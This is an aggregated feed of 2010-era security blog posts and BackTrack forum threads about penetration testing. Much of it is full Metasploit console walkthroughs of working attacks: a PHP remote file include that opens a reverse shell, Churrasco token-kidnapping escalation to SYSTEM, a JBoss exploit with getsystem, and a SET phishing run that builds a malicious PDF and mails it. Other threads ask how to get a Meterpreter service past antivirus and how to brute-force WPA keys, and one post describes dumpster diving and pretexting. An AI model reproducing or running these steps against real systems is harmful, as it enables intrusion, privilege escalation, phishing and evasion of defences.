Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like
Simple Text-File Login Remote File Include that has a vulnerable string of:
/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
and make your PHPURI
PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
let's see it in action
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...
Exploits
========
Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit
msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info
Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm
egypt
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Space: 32768
Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:
msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30
%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010
dir
0.jpeg header.inc.php license.txt slog_users.txt version.txt
1.jpeg index.asp old slogin.inc.php
adminlog.php install.txt readme.txt slogin_genpass.php
footer.inc.php launch.asp slog_users.php slogin_lib.inc.php
id uid=33(www-data) gid=33(www-data) groups=33(www-data)
-
-
7:29
»
Carnal0wnage
Back in 09 there was a buzz about token kidnapping by Argeniss
http://www.argeniss.com/research.htmlhttp://www.argeniss.com/research/TokenKidnapping.pdfsubsequently patched
http://www.microsoft.com/technet/security/bulletin/MS09-012.mspxI'm normally violently against uploading binaries to boxes but until the local exploit functionality is added to msf...
The gist is you an run the Churrasco binary and it will execute a command for you as SYSTEM from NETWORK SERVICE (the shell privs you get when exploiting IIS). See the slides for more.
Lets see it in action.
We have our network service shell, push up our churrasco binary, metasploit payload, and run it.
*I had issues on my VM getting staged payloads in msf to run, so I opted for a shell/reverse_tcp and then tried to upgrade the shell to meterpreter.
[*] Meterpreter session 3 opened (192.168.6.94:443 -> 192.168.6.94:62700)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > pwd
c:\windows\system32\inetsrv
Upload the exploit binary and your reverse shell binary. I used the webdav vuln that got me on the box to upload it as churrasco.bin, network service is weird about where it can write to, but it should be writable somewhere if you don't have the file upload route.
meterpreter > shell
Process 3872 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\windows\system32\inetsrv>cd C:\Inetpub\wwwroot
C:\Inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is F48F-220E
Directory of C:\Inetpub\wwwroot
05/10/2010 06:53 AM .
05/10/2010 06:53 AM ..
05/10/2010 06:53 AM 410,624 Churrasco.bin
02/21/2003 06:48 PM 1,433 iisstart.htm
05/10/2010 07:19 AM 37,888 shell.bin
05/10/2010 07:43 AM 173 test4.asp;.txt
4 File(s) 2,105,685 bytes
2 Dir(s) 36,227,641,344 bytes free
Let's run the exploit and have it kick off our reverse shell back to us. Set up the multi/handler... blah blah
C:\Inetpub\wwwroot>Churrasco.bin shell.bin
Churrasco.bin shell.bin
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM
on the multi/handler side...
[*] Command shell session 1 opened (192.168.6.94:443 -> 192.168.6.94:62854)
(C) Copyright 1985-2003 Microsoft Corp.
C:\Inetpub\wwwroot>whoami
whoami
nt authority\system
C:\Inetpub\wwwroot>^Z
Background session 1? [y/N] y
msf exploit(handler) > sessions -u 1
msf exploit(handler) > [*] Meterpreter session 2 opened (192.168.6.94:443 -> 192.168.6.94:62855)
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell Microsoft Windows [Version 5.2.3790] 192.168.6.94:443 -> 192.168.6.94:62854
2 meterpreter NT AUTHORITY\SYSTEM @ LAB 192.168.6.94:443 -> 192.168.6.94:62855
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
-
-
8:24
»
Carnal0wnage
MC pushed out a new exploit today (
jboss_deploymentfilerrepository)
so while it lists 4.x as vuln, actually several other versions are vulnerable as well including 6.0.0M1 and 5.1.0 :-)
msf exploit(jboss_deploymentfilerepository) > exploit
[*] Started reverse handler on 192.168.1.101:4444
[*] Triggering payload at '/web-console/HYQ.jsp'...
[*] Command shell session 3 opened (192.168.1.101:4444 -> 192.168.1.101:57796) at Sun May 09 11:20:31 -0400 2010
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>whoami
whoami
win2k3lab\administrator
C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>^Z
Background session 3? [y/N] y
msf exploit(jboss_deploymentfilerepository) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
3 shell 192.168.1.101:4444 -> 192.168.1.101:57796
msf exploit(jboss_deploymentfilerepository) > sessions -u 3
msf exploit(jboss_deploymentfilerepository) >
msf exploit(jboss_deploymentfilerepository) > [*] Meterpreter session 4 opened (192.168.1.101:4444 -> 192.168.1.101:36591) at Sun May 09 11:21:32 -0400 2010
msf exploit(jboss_deploymentfilerepository) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
3 shell 192.168.1.101:4444 -> 192.168.1.101:57796
4 meterpreter win2k3lab\Administrator @ win2k3lab 192.168.1.101:4444 -> 192.168.1.101:36591
msf exploit(jboss_deploymentfilerepository) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > getuid
Server username: win2k3lab\Administrator
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin
meterpreter >
-
-
20:22
»
Carnal0wnage
Layer Four Traceroute (lft)
http://pwhois.org/lftIf you are using the one bundled with your distro you are probably missing out some of the more interesting and new features.
From the site:
"
LFT, short for Layer Four Traceroute, is a sort of 'traceroute' that often works much faster (than the commonly-used Van Jacobson method) and goes through many configurations of packet-filters (firewalls). More importantly, LFT implements numerous other features including AS number lookups through several reliable sources, loose source routing, netblock name lookups, et al.
What makes LFT unique? LFT is the all-in-one traceroute tool because it can launch a variety of different probes using ICMP, UDP, and TCP protocols, or the RFC1393 trace method."
Its been useful for me to locate more systems between me and the target host as well as identifying gateways/web firewalls that organization's send all (or some)web traffic through.
It also handy that you can throw it some switches to show the AS and network routes with the scan as well.
Old Traceroute:
cg@meh:~/evil/lft-3.1$ traceroute www.microsoft.com
traceroute to www.microsoft.com (65.55.21.250), 30 hops max, 60 byte packets
1 192.168.1.1 (192.168.1.1) 4.681 ms 5.794 ms 14.193 ms
2-8 Local Stuff
9 pos-0-0-0-0-pe01.ashburn.va.ibone.comcast.net (68.86.86.26) 35.743 ms 36.391 ms 37.102 ms
10 as8075-1.ashburn.va.ibone.comcast.net (75.149.230.42) 173.747 ms 174.136 ms 175.054 ms
11 209.240.199.162 (209.240.199.162) 32.762 ms 33.703 ms 37.096 ms
12 ge-6-1-0-0.bl2-64c-1a.ntwk.msn.net (207.46.43.5) 17.652 ms 28.151 ms 24.033 ms
13 ge-0-0-0-0.bl2-64c-1b.ntwk.msn.net (207.46.43.85) 24.864 ms 25.951 ms 26.485 ms
14 ge-3-1-0-0.co2-64c-1a.ntwk.msn.net (207.46.43.101) 109.384 ms 109.615 ms 110.180 ms
15 ge-7-0-0-0.co2-64c-1b.ntwk.msn.net (207.46.43.197) 106.607 ms 107.401 ms 110.382 ms
16 207.46.46.92 (207.46.46.92) 112.458 ms 118.682 ms 106.207 ms
17 10.22.8.14 (10.22.8.14) 107.323 ms 107.552 ms 107.789 ms
18 * * *
19 * * *
20 * * *
21 * * *
22 * * *
23 * * *
24 * * *
25 * * *
26 * * *
27 * * *
28 * * *
29 * * *
30 * * *
Layer Four Traceroute
cg@meh:~/evil/lft-3.1$ sudo lft -rNS www.microsoft.com -d 80
TTL LFT trace to 65.55.21.250:80/tcp
1 [33657] [CMCS] 192.168.1.1 2.3/1.5ms ** [neglected] no reply packets received from TTLs
2 through -8 local stuff
9 [7922] [COMCAST-7922] pos-0-0-0-0-pe01.ashburn.va.ibone.comcast.net (68.86.86.26) 27.2/26.6ms
10 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] as8075-1.ashburn.va.ibone.comcast.net (75.149.230.42) 25.9/24.3ms
11 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] 209.240.199.162 15.8/24.3ms
12 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-6-1-0-0.bl2-64c-1a.ntwk.msn.net (207.46.43.5) 34.1/14.8ms
13 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-0-0-0-0.bl2-64c-1b.ntwk.msn.net (207.46.43.85) 16.0/15.9ms
14 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-3-1-0-0.co2-64c-1a.ntwk.msn.net (207.46.43.101) 121.3/98.2ms
15 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-7-0-0-0.co2-64c-1b.ntwk.msn.net (207.46.43.197) 114.1/97.3ms
16 [6067] [ONYX] 207.46.46.92 101.6/99.9ms
17 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] 10.22.8.14 99.5/109.5ms
18 [AS?] [Net?] [target open] 65.55.21.250:80 98.5/109.4ms
-
-
4:46
»
remote-exploit & backtrack
This metasploit module fails to work, if i use it over the internet. In a lan-area it works pretty well.
Code:
msf exploit(java_ws_arginject_altjvm) > exploit
[*] Exploit running as background job.
[-] Handler failed to bind to 95.X.X.X:6113
[*] Started reverse handler on 0.0.0.0:6113
[*] Using URL: hxxp://0.0.0.0:80/
[*] Local IP: hxxp://192.168.0.5:80/
[*] Server started.
[*] Request for "/" does not contain a sub-directory, redirecting to /3QZOcxOo/ ...
[*] Responding to "GET /3QZOcxOo/" request from 95.X.X.X:60576
[*] Sending js detection HTML to 95.X.X.X:60576...
[*] Responding to "GET /3QZOcxOo/uUW6gpQfujicR.shtml" request from 95.X.X.X:61148
[*] Sending JS version HTML to 95.X.X.X:61148...
[*] Responding to WebDAV "OPTIONS /" request from 192.168.0.10:1042
[*] Request for "/3QZOcxOo" does not contain a sub-directory, redirecting to /3QZOcxOo/ ...
[*] Received WebDAV "PROPFIND /3QZOcxOo/" request from 192.168.0.10:1042
[*] Sending directory multistatus for /3QZOcxOo/ ...
[*] Request for "/3QZOcxOo" does not contain a sub-directory, redirecting to /3QZOcxOo/ ...
[*] Received WebDAV "PROPFIND /3QZOcxOo/" request from 192.168.0.10:1042
[*] Sending directory multistatus for /3QZOcxOo/ ...
[*] Received WebDAV "PROPFIND /3QZOcxOo/jvm.dll" request from 192.168.0.10:1042
[*] Sending DLL multistatus for /3QZOcxOo/jvm.dll ...
[*] Responding to "GET /3QZOcxOo/jvm.dll" request from 192.168.0.10:1042
[*] Sending DLL to 192.168.0.10:1042...
[*] Sending stage (748032 bytes) to 95.X.X.X
[*] Meterpreter session 1 opened (192.168.0.5:6113 -> 95.X.X.X:60066) at 2010-05-04 12:47:22 +0100
same problem as the guy on top (hxxp://blog.metasploit.com/2010/04/java-web-start-argument-injection.html?showComment=1271428170411#c50095338 63542996215 )
jduck answered that this results from a not running WebClient service, but in my test case it is definitely running.
webdav is switching to the internal ip, maybe this is the problem.
Code:
[*] Responding to WebDAV "OPTIONS /" request from 192.168.0.10:1042
-
-
9:01
»
remote-exploit & backtrack
hi, do you know where can i edit the vnc injection server settings?
defaults settings make a remote vnc connection too slow.
In the client side i tried to connect with xvncviewer editing compression depth and other options but it doesn't change.
Thanks ;)
-
8:59
»
remote-exploit & backtrack
hey guys, i can't make metsvc undetected.
i tried to encode it with some crypters but it doesn't work,
so i tried to recompile the source but avira get it every time...then i discover that avira detect the call listen() in the code of metsvc and then mark it as a backdoor!
any suggestion!? what can i do?
thanks
-
-
10:37
»
remote-exploit & backtrack
Does anyone know of a freely available pcap "attack library" which could be run through TCPreplay? Specifically, I'd like the ability to select either specific individual or multiple-simultaneous attacks and send those attacks down the wire.
I've run some searches but haven't come up with anything yet---thought I would post here before I start building it out myself.
Thanks!
-
8:36
»
remote-exploit & backtrack
I'm having a problem updating it
It says "Error: rsync failed. Your NVT collection might be broken now."
Firewall? ..I'm using a domain for downloads, and that's blocking me.. How can i define the proxy in the Konsole, like I had to do on Firefox?
Ty
-
-
0:49
»
remote-exploit & backtrack
In a PEnTest Scenario we have found a open port for for "3306/tcp open mysql port unauthorized" service .
How we can try to connect it remotely.What more further information we can gain using this information
-
-
18:01
»
remote-exploit & backtrack
Hey everyone,
I'm a bit new to the use of John the Ripper so please bear with me.
Currently I'm working with wordlist mangling for a class. What I need now is a rule that allows for only some of a single character to be switched.
For example, if I'm using a simple switch rule like this:
so[o0]
it would give me: google, g00gle, etc.
But I need it to also be able to give go0gle, g0ogle, etc.
Is there any rules that can help perform this? Thanks in advance. :)
-
-
5:33
»
remote-exploit & backtrack
Hello,
I am trying to use 'auxiliary/admin/oracle/login_brute' in metasploit 3.3 but I am getting the following error.
------
[-] Auxiliary failed: NameError uninitialized constant OCIError [-] Call stack:
[-]
/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:434:in
`load_missing_constant'
[-]
/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:80:in
`const_missing_with_dependencies'
[-]
/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:92:in
`const_missing'
[-] (eval):55:in `rescue in block in run'
[-] (eval):52:in `block in run'
[-] /usr/lib/ruby/1.9.1/csv.rb:1761:in `each'
[-] /usr/lib/ruby/1.9.1/csv.rb:1197:in `block in foreach'
[-] /usr/lib/ruby/1.9.1/csv.rb:1335:in `open'
[-] /usr/lib/ruby/1.9.1/csv.rb:1196:in `foreach'
[-] (eval):47:in `run'[*] Auxiliary module execution completed
-----
I have tried the below recommendation for Windows Server 2003 environment but it is giving the same problem. Please assist. Thanks.
[1]Install subversion client
CollabNetSubversion-client-1.6.9-1.win32.exe
[2]install ruby
ruby186-27_rc2.exe
[3]install ruby-oci8
wget ruby-oci8-1.0.7-mswin32.rb
ruby ruby-oci8-1.0.7-mswin32.rb
[4]
svn co metasploit.com/svn/framework3/trunk/ metasploit
cd metasploit
ruby msfconsole (I am not able to execute this command successfully)
-
-
18:06
»
remote-exploit & backtrack
For the last few weeks i've been playing with metasploit ...
Ive had fun hacking an old server using the old net_api overflow on xp sp 2
I just read the metasploit blog about the new adobe_libtiff exploit
i used the payload
windows/meterpreter/reverse_tcp
(is this right ?)
I have the PDF on the target machine it works A ok and connects back to my machine on xxx.xxx.xxx.3:1133 my question is ....
how do i go from a tcp connection to either a meterpreter session or vncinject using the command line in ruby ?
i've tried:
connect xxx.xxx.xxx.4:1133 ... it connects but then does nothing ?
^^^ do i need to run this as a bg session/job ?
any suggestions please
& please dont flame me
-
-
15:27
»
remote-exploit & backtrack
hello all
i am trying to get remote access to my main computer on my network using the set email attack.
however when i open the pdf i do not get command line access!
see below:
thanks in advance for the advice
yoma
Code:
.M"""bgd `7MM"""YMM MMP""MM""YMM
,MI "Y MM `7 P' MM `7
`MMb. MM d MM
`YMMNq. MMmmMM MM
. `MM MM Y , MM
Mb dM MM ,M MM
P"Ybmmd" .JMMmmmmMMM .JMML.
[---] The Social-Engineer Toolkit (SET) [---]
[---] Written by David Kennedy (ReL1K) [---]
[---] Version: 0.4.1 [---]
[---] Codename: 'Rise of the Pink Pirate' [---]
[---] Report bugs to: davek@social-engineer.org [---]
[---] Check out: http://social-engineer.org [---]
[---] Homepage: http://www.secmaniac.com [---]
[---] Tutorial: http://offsec.com/metasploit-unleashed [---]
[---] Unpublished Java Applet by: Thomas Werth [---]
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
Select from the menu on what you would like to do:
1. Spear-Phishing (Email) Attacks
2. Website Attack Vectors
3. Update the Metasploit Framework
4. Update the Social-Engineer Toolkit
5. Create a Payload and Listener
6. Help, Credits, and About
7. Exit the Social-Engineer Toolkit
Enter your choice: 1
Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!
1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu.
Enter your choice: 1
Select the file format exploit you want.
The default is the PDF embedded EXE.
********** PAYLOADS **********
1. Adobe Collab.collectEmailInfo Buffer Overflow
2. Adobe Collab.getIcon Buffer Overflow
3. Adobe JBIG2Decode Memory Corruption Exploit
4. Adobe PDF Embedded EXE Social Engineering
5. Adobe util.printf() Buffer Overflow
6. Custom EXE to VBA (sent via RAR) (RAR required)
7. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
Enter the number you want (press enter for default): 4
You have selected the default payload creation. SET will generate a normal PDF with embedded EXE.
1. Windows Reverse TCP Shell
2. Windows Meterpreter Reverse_TCP
3. Windows Reverse VNC
4. Windows Reverse TCP Shell (x64)
5. Windows Meterpreter Reverse_TCP (X64)
6. Windows Shell Bind_TCP (X64)
Enter the payload you want (press enter for default): 1
Enter the port to connect back on (press enter for default):[*] Defaulting to port 443...[*] Generating fileformat exploit...[*] Please wait while we load the module tree...[*] Started reverse handler on 192.168.1.3:443[*] Reading in 'src/msf_attacks/form.pdf'...[*] Parsing 'src/msf_attacks/form.pdf'...[*] Parsing Successful.[*] Using 'windows/shell_reverse_tcp' as payload...[*] Creating 'template.pdf' file...[*] Generated output file /pentest/exploits/SET/src/program_junk/template.pdf
[*] Payload creation complete.[*] All payloads get sent to the src/msf_attacks/template.pdf directory[*] Payload generation complete. Press enter to continue.
As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of 'template.whatever'
Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.
Enter your choice (enter for default): 1
Keeping the filename and moving on.
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one indivdual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.
Enter your choice: 1
Do you want to use a predefined template or craft
a one time email template.
1. Pre-Defined Template
2. One-Time Use Email Template
Enter your choice: 1
Below is a list of available templates:
1: LOL...have to check this out...
2: Dan Brown's Angels & Demons
3: Baby Pics
4: New Update
5: Computer Issue
6: Status Report
7: Strange internet usage from your computer
Enter the number you want to use: 1
Enter who you want to send email to:(my email)
What option do you want to use?
1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay
Enter your choice: 1
Enter your GMAIL email address: (same email again)
Enter your password for gmail (it will not be displayed back to you):
SET has finished deliverying the emails.
Do you want to setup a listener yes or no: yes
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 535 exploits - 254 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
=[ svn r8859 updated today (2010.03.20)
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.3
LHOST => 192.168.1.3
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.3:443[*] Starting the payload handler...
msf exploit(handler) >[*] Command shell session 1 opened (192.168.1.3:443 -> 192.168.1.4:3768)
msf exploit(handler) >
-
13:05
»
remote-exploit & backtrack
Note: I haven't made 15 posts yet so the pictures can be found in the distorted URLs.
There is no such thing as irrelevant information ~ Muts
During the information gathering stage (if possible) I visit the target for some reconnaissance work in a process that involves exploration and inference. In this case I examined a telecommunications centre which houses a base transceiver station(cell site) and a virtual switchboard. All of this was done with permission. This is a simple overview of my methodology and the purpose of it is to demonstrate how trifles can turn out to be useful pieces of information.
Gear
1) Gloves: I don't need to explain this one?
2) Knife: For cutting bags
3) Torch: A portable light with a magnifying glass(good for poorly written scribbles)
4) Folder, backpack or plastic bag(I prefer the latter)
5) Digital camera: Indispensable.
h ttp://i41.tinypic.com/16lidko.jpg
Appearance
I usually put on clothes which give me the air of a vagrant but I don't exaggerate it. I'll wear a cheap rain jacket, torn jeans, a hood and I'll remove my glasses and mess up my goatee beard. This will avail against prying eyes since I'll just look like a bum rummaging the garbage for recyclable materials and/or food. Why is this important? because I don't want to produce the impression of an document/identity thief.
Garbage
Even in the days of the paper shredder it's very likely you'll find whole documents, letters and all sorts of memorandums. From this we can collect names of employees and customers, phone numbers, email addresses, material on office routines, schedules and so on and so forth. I addition to useful info I can also deduce recent activities. Let's take a look.
h ttp://i41.tinypic.com/k51nao.jpg
Note the abundance of twisted pair cabling that is on top; could this be just old wires? or perhaps a change in equipment?
Lying below the bag of wiring on the left side I found a box--- on it is an address of a seller and manufacturer of computer equipment and in addition on the post label there is a content description stating "modular connectors". From this I can deduce that they have indeed been improving their network and this could be fodder for a social engineering attack.
h ttp://i44.tinypic.com/2rdztjc.jpg
And finally paper, white gold. I always stress my search for crumpled and/or torn notes.
From all this I found the following:
9 Employee names
More assorted names and phone numbers to count. Customers perhaps?
3 work schedules
A paper with the IPs of local hosts scribbled on them, as well as other connection config info.
A document with electronic consumption measurements.
An employment application.
A crumpled post-it-note with a username and password from a web-app of their site.
An internal "staff only" URL
h ttp://i43.tinypic.com/14nzjte.jpg
The Building
I have an eye open for aberrations, I view this as fodder for social engineering attacks. I also peek inside for anything that could be of use.
h ttp://i39.tinypic.com/s4wi9f.jpg
Trouble with your antenna? Here I'm allowed to draw the conclusion that their TV reception is poor. This could be useful fodder for an SE attack; I could ascertain who's behind their TV service and impersonate a service rep stating that he detects that their television converter box or set-top box is receiving a sub-par signal and thus send them an email containing guidelines on improving their signal. This email could be a vehicle for a backdoor payload or contain links to sham sites on improving the signal or maybe even a manual of whatever set-top unit they are using. Remember, being elaborate is a key element.
h ttp://i43.tinypic.com/8zpahg.jpg
May not be clear on photo but they are all running Win XP Pro. Earlier that evening I saw that the monitor at the anterior was displaying the latest version of Internet Explorer and MSN messenger.
h ttp://i44.tinypic.com/140ygi1.jpg
Now I know who is providing security.
h ttp://i42.tinypic.com/35d2rmb.jpg
Hmm... vandalism? maybe they are not doing such a good job. Here I can make a telephone call or send a sham email from a competing security guard services provider or maybe even send an email from Securitas themselves and use the vandalism examples as a basis for a proposition for increased patrolling and in the process implement an attack similar to the one with the antenna problem.
h ttp://i42.tinypic.com/9idyk4.jpg
The lights are turned on at 3:00 in the morning?
Nice, a whiteboard. Here I learnt important topics which are evidently under discussion at this business. In this case they were looking for buyers for a telephone directory service. This is something which I could avail myself of, such as shammed interest in this product as a pretext to gain more info or maybe even access(which I eventually did).
Conclusion
In just 30 minutes I acquired a good chunk of information without any key strokes, which aided me very well latter on in the attack. I am happy to announce that I successfully penetrated several computers at this company using mostly what I observed on the physical site. I did proposed to them the following solutions:
1. Use
paper shredders
2. Turn your damn lights off.
3. Be more circumspect with phonecalls and emails pertaining to problems visible from the outside.
If you live in the same or an adjacent city you could give this a try. It's quite a thrill.
-
-
15:17
»
remote-exploit & backtrack
I have a client with an older Fedora box. They allow external connections via the built in remote desktop sharing (vino-server). I've been asked to audit the vnc connections to the box for the past 3 months.
I didn't set up the machine so I'm not sure what options have been set up for logging. Does anyone know if there are any default vnc logs or where I can start looking for connection logs to port 5900?
Thanks in advance.
-
0:53
»
remote-exploit & backtrack
hi,
MS10-002 ,ie_iepeers (Microsoft Internet Explorer iepeers.dll use-after-free exploit )
4xsecurityteam.blogspot(dot)com (home page)
4xunderground.blogspot(dot)com
vimeo(dot)com/user1010000
thk$
-
-
15:33
»
remote-exploit & backtrack
Hey guys, i have seen lots of documents about how to hack and ive tried many exploits on my test server (hp proliant dl380g3 i got off ebay :D). But ive never tryed rooting it before :S i looked around google but only found outdated papers from the 90s lol. i have seen webshells like c99 and r57, with options like "connect back" and "bind shell". Ive looked into it and found that for "connect back" you have to portfoward if it a remote host connecting to you, but not if its a lan. "Bind shell" is me doing "nc <ip> <port>", which is usually blocked by firewalls?
so people say "connect back" shell are the best but dont they show your ip address? also ive heard of data pipe shells which has something to do with irc?
Could someone educate me some more please :D
-
8:29
»
remote-exploit & backtrack
what is --threads[num] mean when using the option. iv search for awhile and i cant find notihng!!! :o
-
-
12:40
»
remote-exploit & backtrack
[*] Automatically detecting the target...[*] Fingerprint: Windows 2003 Service Pack 1 - lang:Unknown[*] Could not determine the exact language pack[*] Exploit completed, but no session was created.
Exploit target:
Id Name
-- ----
0 Automatic Targeting
How can i manually select the version of it + language?
my 2nd question is how do i run the GUI of metasploit in windows?
Thanks.
-
3:51
»
remote-exploit & backtrack
Hi,
Last week I decided to check if my network was secure "enough". I got my WPA Handshake within seconds (which is quite acceptable). I then got down to trying to crack it.
I used all the dictionaries i could get my hands on to try and brute-force my way in but found nothing. So far so good. But I still wasn't convinced.
Through some social engineering, and after a few pints of lager, i tricked myself into telling me that the password was made of a 10 digit mixture of letters and numbers. I therefore tried a different way:
/pentest/password/crunch 10 10 "abcdefghijkl.......1234567890" | aircrack-ng ..... wpa-01.cap
After something like 4 days of scanning 385 keys/second it had barely just started the 3rd digit. This made me feel a lot safer.
Question: Are there "faster" ways other than crunch to get to a 10 digit password by checking every possible permutation, or may I assume that no one is going to have the time to crack my password (at least for the next few hundreds of years) ???
Thanks
-
-
17:17
»
remote-exploit & backtrack
I am trying to crack an administrator password on a windows xp 40g hard drive and every goes well until /mnt/sda1/windows.
I checked in Konqueror and can navigate to /mnt/sda1/ but no files are shown. I know there are files there because I can boot into xp just fine. . .
Any suggestions?
-
15:54
»
remote-exploit & backtrack
Hello, I posted this in the OffSec PWB forum, but I don't think it's frequented that often hence no response. Apologies for the re-post if you've already come across this.
I've been doing some research into tcp wrappers recently, having noticed that a few services within the pwb lab are wrapped. As I understand it tcpwrappers are a method of applying an ACL to a service, based on IP address.
I've figured that I can only talk to wrapped services if i'm bouncing through another host, but is there a reliable way of determining which hosts are in the ACL? The only ideas i've had on this so far seem to require some cache poisoning, which seems more than likely to mess things up (and poisoning is not allowed in the labs anyway!).
Spoofing my source address could be an option I suppose, but that would mean responses are directed elsewhere I guess...
Can anyone share any insights into this? Even a nudge in the right direction would be appreciated.
Thanks
Chris
-
-
21:52
»
remote-exploit & backtrack
Hello all,
